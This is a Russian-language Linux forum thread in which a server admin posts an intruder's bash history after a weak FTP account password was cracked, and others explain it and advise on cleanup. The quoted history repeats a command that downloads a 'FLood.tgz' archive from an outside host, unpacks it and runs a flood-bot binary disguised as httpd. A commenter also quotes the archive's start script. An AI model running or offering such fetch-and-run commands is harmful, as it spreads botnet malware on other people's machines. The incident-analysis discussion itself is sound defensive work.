LINUX.ORG.RU
ФорумAdmin

Взломали пароль пользователя


0

0

RedHat 2.6.18-194.el5
Сервер http, vsftpd, почта.

Пытался войти на FTP по авториз. доступу (vsftpd) - не пустил, не верный пароль.
Выставил учетке пароль заново, вошел на FTP и увидел файл .bash_history:
--------------
passwd
w
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd /var/tmp
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
curl -O
ls -a
ps x
cd /var/tmp
wget
uptime
cd /tmp
ls -a
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd
ls -a
ls -a
cd mc-root
chmod +x *
PATH="."
httpd
cd
rm -rf mc-root
--------------
Пользователь принадлежит группе ftp, но оболочка была прописана /bin/bash (это упущение). Пароль был простой.
/etc/passwd остался не тронут.
Я плохо в этом разбираюсь. Скажите пожалуйста, что это было? Сам человек ломал или какой вирус? Я так понял, с ресурса был загружен архив и распакован.
И что за повторения «httpd»?
Скажите, мог ли хакер получить доступ к папкам, расположенным выше своей?
Стоит ли теперь переустанавливать? Образ есть.

> Сам человек ломал или какой вирус?

если остались следы в bash_history, то это был интерактивный шелл, то есть человек. Да ещё и не очень старающийся скрыть свои действия, такое палево оставил

> И что за повторения «httpd»?

скачал архив, распаковал, перешёл в распакованный каталог, запустил из него httpd. Видимо, тебе надо прибить этот процесс ))))

> Скажите, мог ли хакер получить доступ к папкам, расположенным выше своей?

Похоже, что он тебе оставил полный список всего, что он сделал

name_no ★★ ()

Смени пароль и перезагрузись (поубивай httpd процессы)

sdio ★★★★★ ()

судя по всему этот ксакеп понимает в Linux не многим больше твоего, и я бы не слишком беспокоился: вот это ещё имеет какой-то смысл (и то, если запущено один раз или не из командной строки а из скрипта)

cd mc-root ; chmod +x * ; PATH="." ; httpd
но
cd mc-root
chmod +x *
PATH="."
httpd
cd
rm -rf mc-root
работать просто не может.

pupok ★★ ()
Ответ на: комментарий от gserg

Перезагрузил, удалил пользователя ftp вместе с домашним каталогом.
Создал нового с оболочкой /sbin/nologin и сложным паролем.
Вот только все еще не решил, стоит ли восстанавливать с образа...

Slon747 ()
Ответ на: комментарий от name_no

>если остались следы в bash_history, то это был интерактивный шелл, то есть человек.

Совсем не обязательно.

man expect, например.

edigaryev ★★★★★ ()
Ответ на: комментарий от pupok

pupok> работать просто не может.
Тебя смущает удаление директории при запущенной из нее (директории) программы?

sdio ★★★★★ ()
Ответ на: комментарий от sdio

А чему тут смущаться. В данном случае httpd - демон. Он один фиг отвязывается от терминала и ему всё равно - удалили или нет его исполняемый файл.

gserg ★★ ()
Ответ на: комментарий от sdio

> Тебя смущает удаление директории при запущенной из нее (директории) программы?

его смутило то, что после PATH="." работают команды cd и rm. Я даже не сразу понял, почему его это смутило — настолько привык к тому, что они встроенные в баш

name_no ★★ ()

Стандартно подпихнут модифицированный вебсервер. Но вобще любопытный архивчик.

$ tar xzf FLood.tgz
$ cd mc-root/
$ ls
1 b b2 c4 f f4 h httpd j j2 Luana.seen mech.help mech.levels mech.pid mech.set s sl start.sh std stream tty usr v2 x
$ ldd httpd
   linux-gate.so.1 => (0xf77d3000)
   libc.so.6 => /lib32/libc.so.6 (0xf7656000)
   /lib/ld-linux.so.2 (0xf77d4000)

Valmont ★★★ ()
Ответ на: комментарий от Valmont

Ну да, это может быть вобще бинарник не вебсервера, просто с аналогичным названием. Поковырять, что ли :-)

Valmont ★★★ ()
Ответ на: комментарий от name_no

> смутило то, что после PATH="." работают команды cd и rm

ещё больше смутило то, что после того как система очевидно перестала отвечать на команды злоумышленника он упорно продолжал их повторять видимо в надежде что компьютер сжалится :)

pupok ★★ ()
Ответ на: комментарий от Slon747

глядя на первое сообщение и версию ОС/ядра (а это последнее в рхеле/центосе - и сплойты под них как то особо не распостранены) + если своевременно обновлялся софт + не было каких либо самодельных дыр в системе безопасности типа 777 на /etc - то ничего с системными файлами , конфигами или какой либо критичной информацией , не случилось....
но он имел полный доступ по ссх
соответственно мог повесить какие либо демоны на верхних портах.
ps aux |grep имя_того_юзера
ну и закилить их...
для параноиков можно ребут

guyvernk ()
Ответ на: комментарий от edigaryev

> Может быть стоит сначала поставить этот самый expect?

так я и говорю, что он у ТС'а скорее всего не установлен

name_no ★★ ()
Ответ на: комментарий от gserg

> А чему тут смущаться. В данном случае httpd - демон

это вовсе не httpd, а бинарь флуд-бот, который в выводе ps и top должен «косить» неприметно под apache.
встречал такое на криво настроенных клиентских VDS, где разрешено запускать бинари из клиентских хомяков.

Komintern ★★★★★ ()
Ответ на: комментарий от guyvernk

> а где нет та?

В единственно правильном дистрибутиве, например, нет ничего, что сам не установишь. Можно даже крон не ставить. Если у тебя отключены аватарки, то единственный правильный дистрибутив — это gentoo.

name_no ★★ ()
Ответ на: комментарий от gserg

не, ну если бы некий больной вдруг захватил мою единственную вендовую машину, я б не упустил возможности запойзонить ботсетку.

Lee_Noox ★★★ ()
Ответ на: комментарий от name_no

ОС топикстарера можно легко угадать по выложеному им uname -r
и это ынтерпрайз, а не «ололо я компелировал всю ночь и теперь офис работает на 0.01% быстрее»

guyvernk ()
Ответ на: комментарий от guyvernk

> а где нет та?

К примеру, у меня на работе:

cat /etc/redhat-release
Scientific Linux SL release 5.5 (Boron)

rpm -q expect
пакет expect не установлен

Или у меня же дома:

cat /etc/redhat-release
Fedora release 13 (Goddard)

man expect
Ничего про expect в руководстве нет

dexpl ★★★★★ ()

Кстати, авторизация на ftp-сервере отражается в /var/log/auth.log? Погрепай по юзеру ftp, глянь когда это произошло. В архиве лежал скриптик start.sh

/#bin/bash
PATH="."
httpd
echo «Enjoy FloodBot based on OverKill»

Почему бы всего навсего его не запустить было? :)

Ща на виртуалке попробую :)

anton_jugatsu ★★★★ ()
Ответ на: комментарий от Slon747

> Скажите, мог ли он что-либо модифицировать вне своей директории?

От рута запусти rpm -Va | less и посмотри, менялись ли системные файлы, и если да, то как

dexpl ★★★★★ ()

Все! Это только переустановка! =)

qsloqs ★★ ()

И что за хэккеры пошли, историю им почистить влом.

BSD ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.